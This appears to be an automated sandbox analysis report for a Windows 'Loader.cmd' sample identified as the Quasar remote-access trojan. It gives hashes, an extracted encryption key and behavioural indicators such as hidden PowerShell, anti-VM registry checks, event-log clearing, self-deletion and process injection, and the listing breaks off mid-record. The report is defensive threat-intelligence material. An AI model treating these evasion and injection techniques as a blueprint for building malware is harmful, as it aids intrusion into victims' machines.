Analysis
-
max time kernel
150s -
max time network
142s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
05-01-2025 03:47
Static task
static1
Behavioral task
behavioral1
Sample
Loader.cmd
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral2
Sample
Loader.cmd
Resource
win11-20241007-en
General
-
Target
Loader.cmd
-
Size
7.3MB
-
MD5
1bec1098946595a03fa067a3ef7ce292
-
SHA1
89cfb4a2f8800f1b944d906d959639907672317d
-
SHA256
a8f184a333fb89f41ddca323472463b4ee2cbed63d26d105823300148e2015cb
-
SHA512
dc7e73ed353d50b73a0eb6f1d955812a29fc5e05df300487d1eda49cc78e6748929a17cd59b58148f7e8696fd0fdfd21e8269af6788f1037bda6d8ddf30c6082
-
SSDEEP
49152:262lW3ZtqF71E0f+DP24xmB1F+RfHhZzvTUPbFJMg0FQ5/Ai4cr5YSW7iFsihJv1:k
Malware Config
Extracted
quasar
-
encryption_key
6F38862AF940DB0B877E1A5C024641D617D7FAB6
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral1/memory/1092-2472-0x00000251C7CC0000-0x00000251C8444000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 2148 created 3500 2148 WerFault.exe 89 PID 4428 created 1092 4428 WerFault.exe 110 -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 3500 created 612 3500 powershell.exe 5 PID 2484 created 3500 2484 svchost.exe 89 PID 1092 created 612 1092 powershell.exe 5 PID 2484 created 1092 2484 svchost.exe 110 -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3500 powershell.exe 1092 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Deletes itself 1 IoCs
pid Process 3500 powershell.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx svchost.exe -
Drops file in System32 directory 10 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3500 set thread context of 3708 3500 powershell.exe 94 PID 1092 set thread context of 5096 1092 powershell.exe 112 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN powershell.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\$rbx-onimai2 powershell.exe File created C:\Windows\$rbx-onimai2\$rbx-CO2.bat cmd.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe -
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 61 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 05 Jan 2025 03:48:50 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1736048929" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00188011819E4504" mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000989a96833933a343a10f3e1cbb39576f00000000020000000000106600000001000020000000f2b9cc9510c77e8ad56f3da096d4efacf5e26944adee085356056eef6df88c41000000000e800000000200002000000089997fd1ddea9a2546f9f5a71b9ffbb3ccc7a1cddb24bc5ef32a369bc0f1a4d9b003000081f86f0f5718244bd8efe976c89ba2a13af3665caa57068e4287d638897fb182c31cc172384a861ec5e614c67c62d01f8eb5f2cb0e08c8a673e9979380a6edd0372ead2ecdff63c51e0dd37353f87f286a8ce4922fc3ecd855d86ed7e63cd5c9ef6ddedab87133b382e2218d6de094719c8b36aa6b63f857e2d313692c6d60376c8a1f876046abac2c3c4101d311a61f93a75774196fda751f60a793e08283bf43ce2fb76061a190a50bd2ccbc60677663aba5c66e67554719eb8db79ba8166a17c15d9321272fb025f7273dd7eaa462953bd8173b8e7d8ef0a76e6884e23e8789ff29d475e93d8fdeb885fe70445a3a4720e9390b5b558833859b9bca6022290d5de48174b79d5b8f7f1bb9b1256a744be54d35ef08913b8aa9c4b13bb386bc64b787848f92269411a421545113f32b61db38fa40af40e9f0126465431864e255d787e8d7371b5cd2a0a4ad4cfbd1a348408aa8cb19f35a3fc341572ddf3c1b65c8b7fbac909be16fe702ba2462d1b912ff5729d2cc06c32841f3e0ad2a4dbb9f35a7ae7556a9c8753992cd5ac4e4b1a5f0510a26df355e883e8d02059d25900fc249e1ec30ecae287d617cfdb7b97f8e687ae88fd4c2c9f9ae1255e1a081a23bb49a6502159d57fbae46b3d2f1ae8c5d74464e900ae67fc594e555caeee6170f30e6900d3c578d2d8dc9280553f22b762579726117d569da3eaf2f37461505555eea83e36f7e7c7cd085b9dcfe5c3815ebcdb0652e36ba85595bbe5ac79a767419d95d72fb0b4eaf080c45e9169d5b77772d2571da3cf25cb2bbd3c0e06c18306564e8f3a66a15f15827d91ebb6553c354a8349c1a329ca90592e4469d7361c4a751a8ca814b913c30a1be1b968541c221c4d256ec5347f5fb699f00c3a59335c2c136acadd18593d30a890614f1f17b76b576fbbf9ad5a887b74efaba9ea67b9a8e4feac1a96a4917c5ee20ff0ef0ea4061a3626ace6f812bc9d37f3d7a1c52fdb6a6dfc584ca8ec77faa9c9d9e79740572c73b3ac9dfbe3c29c0108933a40dd0fb9f8bcc5b32e3a2f55aee2f765434bbc2aadb882192b7b13db7ece354cdc55f0c3711935f8d341ee68519233a1e2e6bcbdcad287920a441501ddd82df0609197cabd7f397b6e0efa1085ccb231ccdbe25600d0541ed28b47c3b266bdc5debc05dd7185cc56a5bd31d0a5b5d0ee4287745ea5f0b908b43c626ba2ba0ed9aeab1fb229f108460157dc6e74ed7641fa3b2d6c4bfed23178910fcbda6ecbaa43008181cc19046a01b0c2de211d7087dac6cfcdd2fdc70c4de94f0b334c6666d8b07140469e0147f63a5cff8fbc2ac4240000000b02b35503743ae8f9fce2f46662676269bf99cb447390af83a5eeaf10b90d525393b0fe4e544acfa0a5727ee6797d47acd299d7d600a0d113642b1e15104cc87 mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00188011819E4504 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000989a96833933a343a10f3e1cbb39576f00000000020000000000106600000001000020000000b1d6cfefcae39b95f104c9c0eb9ab10b13ffd8dad5f8b9e8808b7cfb4150e4a6000000000e80000000020000200000000d84a52027e2144fb5463212e1731e0eb9f505d2e6e42cbc8a97c4676762d0b980000000aefb7e970e2f79fb25f2369d59fed9cdfdd8fbaa4f93fedc3ed3b6165572244b6873ebe94169364a33285f0e681bcb1399867151189e4d2a74be4e221b326c3379f1e423b25ce946f22a6c5574f7863a5bad520c808b6c137a3e0bd2634cf54a08fd056f883ac6e57694d217425283593065257452a43acf39255b1c77f4855240000000e2a040c026c581ca0ee8fe350e09ef95195e052e7d387a1236a5887abcfb3eec9636791caab75bf2e221dd1d448e8253d24f797b3556e462d489a280ede668fb mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00188011819E4504" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={AD01EFB1-305B-43BD-A828-F6FE24CDA5CF}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3500 powershell.exe 3500 powershell.exe 3500 powershell.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe 3708 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3668 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3500 powershell.exe Token: SeDebugPrivilege 3708 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2512 svchost.exe Token: SeIncreaseQuotaPrivilege 2512 svchost.exe Token: SeSecurityPrivilege 2512 svchost.exe Token: SeTakeOwnershipPrivilege 2512 svchost.exe Token: SeLoadDriverPrivilege 2512 svchost.exe Token: SeSystemtimePrivilege 2512 svchost.exe Token: SeBackupPrivilege 2512 svchost.exe Token: SeRestorePrivilege 2512 svchost.exe Token: SeShutdownPrivilege 2512 svchost.exe Token: SeSystemEnvironmentPrivilege 2512 svchost.exe Token: SeUndockPrivilege 2512 svchost.exe Token: SeManageVolumePrivilege 2512 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2512 svchost.exe Token: SeIncreaseQuotaPrivilege 2512 svchost.exe Token: SeSecurityPrivilege 2512 svchost.exe Token: SeTakeOwnershipPrivilege 2512 svchost.exe Token: SeLoadDriverPrivilege 2512 svchost.exe Token: SeSystemtimePrivilege 2512 svchost.exe Token: SeBackupPrivilege 2512 svchost.exe Token: SeRestorePrivilege 2512 svchost.exe Token: SeShutdownPrivilege 2512 svchost.exe Token: SeSystemEnvironmentPrivilege 2512 svchost.exe Token: SeUndockPrivilege 2512 svchost.exe Token: SeManageVolumePrivilege 2512 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2512 svchost.exe Token: SeIncreaseQuotaPrivilege 2512 svchost.exe Token: SeSecurityPrivilege 2512 svchost.exe Token: SeTakeOwnershipPrivilege 2512 svchost.exe Token: SeLoadDriverPrivilege 2512 svchost.exe Token: SeSystemtimePrivilege 2512 svchost.exe Token: SeBackupPrivilege 2512 svchost.exe Token: SeRestorePrivilege 2512 svchost.exe Token: SeShutdownPrivilege 2512 svchost.exe Token: SeSystemEnvironmentPrivilege 2512 svchost.exe Token: SeUndockPrivilege 2512 svchost.exe Token: SeManageVolumePrivilege 2512 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2512 svchost.exe Token: SeIncreaseQuotaPrivilege 2512 svchost.exe Token: SeSecurityPrivilege 2512 svchost.exe Token: SeTakeOwnershipPrivilege 2512 svchost.exe Token: SeLoadDriverPrivilege 2512 svchost.exe Token: SeSystemtimePrivilege 2512 svchost.exe Token: SeBackupPrivilege 2512 svchost.exe Token: SeRestorePrivilege 2512 svchost.exe Token: SeShutdownPrivilege 2512 svchost.exe Token: SeSystemEnvironmentPrivilege 2512 svchost.exe Token: SeUndockPrivilege 2512 svchost.exe Token: SeManageVolumePrivilege 2512 svchost.exe Token: SeShutdownPrivilege 3668 Explorer.EXE Token: SeCreatePagefilePrivilege 3668 Explorer.EXE Token: SeShutdownPrivilege 3668 Explorer.EXE Token: SeCreatePagefilePrivilege 3668 Explorer.EXE Token: SeShutdownPrivilege 3668 Explorer.EXE Token: SeCreatePagefilePrivilege 3668 Explorer.EXE Token: SeShutdownPrivilege 3668 Explorer.EXE Token: SeCreatePagefilePrivilege 3668 Explorer.EXE Token: SeShutdownPrivilege 3668 Explorer.EXE Token: SeCreatePagefilePrivilege 3668 Explorer.EXE Token: SeShutdownPrivilege 3668 Explorer.EXE Token: SeCreatePagefilePrivilege 3668 Explorer.EXE Token: SeShutdownPrivilege 3668 Explorer.EXE Token: SeCreatePagefilePrivilege 3668 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1696 wrote to memory of 648 1696 cmd.exe 83 PID 1696 wrote to memory of 648 1696 cmd.exe 83 PID 1696 wrote to memory of 1688 1696 cmd.exe 84 PID 1696 wrote to memory of 1688 1696 cmd.exe 84 PID 1696 wrote to memory of 772 1696 cmd.exe 85 PID 1696 wrote to memory of 772 1696 cmd.exe 85 PID 1696 wrote to memory of 3912 1696 cmd.exe 86 PID 1696 wrote to memory of 3912 1696 cmd.exe 86 PID 1696 wrote to memory of 3192 1696 cmd.exe 88 PID 1696 wrote to memory of 3192 1696 cmd.exe 88 PID 1696 wrote to memory of 3500 1696 cmd.exe 89 PID 1696 wrote to memory of 3500 1696 cmd.exe 89 PID 3500 wrote to memory of 3708 3500 powershell.exe 94 PID 3500 wrote to memory of 3708 3500 powershell.exe 94 PID 3500 wrote to memory of 3708 3500 powershell.exe 94 PID 3500 wrote to memory of 3708 3500 powershell.exe 94 PID 3500 wrote to memory of 3708 3500 powershell.exe 94 PID 3500 wrote to memory of 3708 3500 powershell.exe 94 PID 3500 wrote to memory of 3708 3500 powershell.exe 94 PID 3500 wrote to memory of 3708 3500 powershell.exe 94 PID 3708 wrote to memory of 612 3708 dllhost.exe 5 PID 3708 wrote to memory of 680 3708 dllhost.exe 7 PID 3708 wrote to memory of 968 3708 dllhost.exe 12 PID 3708 wrote to memory of 420 3708 dllhost.exe 13 PID 3708 wrote to memory of 436 3708 dllhost.exe 14 PID 3708 wrote to memory of 700 3708 dllhost.exe 15 PID 3708 wrote to memory of 1028 3708 dllhost.exe 16 PID 3708 wrote to memory of 1044 3708 dllhost.exe 17 PID 3708 wrote to memory of 1188 3708 dllhost.exe 18 PID 3708 wrote to memory of 1232 3708 dllhost.exe 20 PID 3708 wrote to memory of 1308 3708 dllhost.exe 21 PID 3708 wrote to memory of 1400 3708 dllhost.exe 22 PID 3708 wrote to memory of 1428 3708 dllhost.exe 23 PID 3708 wrote to memory of 1444 3708 dllhost.exe 24 PID 3708 wrote to memory of 1452 3708 dllhost.exe 25 PID 3708 wrote to memory of 1504 3708 dllhost.exe 26 PID 3708 wrote to memory of 1584 3708 dllhost.exe 27 PID 3708 wrote to memory of 1712 3708 dllhost.exe 28 PID 3708 wrote to memory of 1728 3708 dllhost.exe 29 PID 3708 wrote to memory of 1768 3708 dllhost.exe 30 PID 3708 wrote to memory of 1852 3708 dllhost.exe 31 PID 3708 wrote to memory of 1884 3708 dllhost.exe 32 PID 3708 wrote to memory of 1956 3708 dllhost.exe 33 PID 3708 wrote to memory of 1984 3708 dllhost.exe 34 PID 3708 wrote to memory of 1992 3708 dllhost.exe 35 PID 3708 wrote to memory of 2004 3708 dllhost.exe 36 PID 3708 wrote to memory of 1320 3708 dllhost.exe 37 PID 3708 wrote to memory of 2136 3708 dllhost.exe 38 PID 3708 wrote to memory of 2252 3708 dllhost.exe 39 PID 3708 wrote to memory of 2392 3708 dllhost.exe 41 PID 3708 wrote to memory of 2512 3708 dllhost.exe 42 PID 3708 wrote to memory of 2568 3708 dllhost.exe 43 PID 3708 wrote to memory of 2580 3708 dllhost.exe 44 PID 3708 wrote to memory of 2708 3708 dllhost.exe 45 PID 3708 wrote to memory of 2744 3708 dllhost.exe 46 PID 3708 wrote to memory of 2760 3708 dllhost.exe 47 PID 3708 wrote to memory of 2828 3708 dllhost.exe 48 PID 3708 wrote to memory of 2840 3708 dllhost.exe 49 PID 3708 wrote to memory of 2864 3708 dllhost.exe 50 PID 3708 wrote to memory of 2884 3708 dllhost.exe 51 PID 3708 wrote to memory of 2184 3708 dllhost.exe 52 PID 3708 wrote to memory of 3120 3708 dllhost.exe 53 PID 3708 wrote to memory of 3176 3708 dllhost.exe 54 PID 3708 wrote 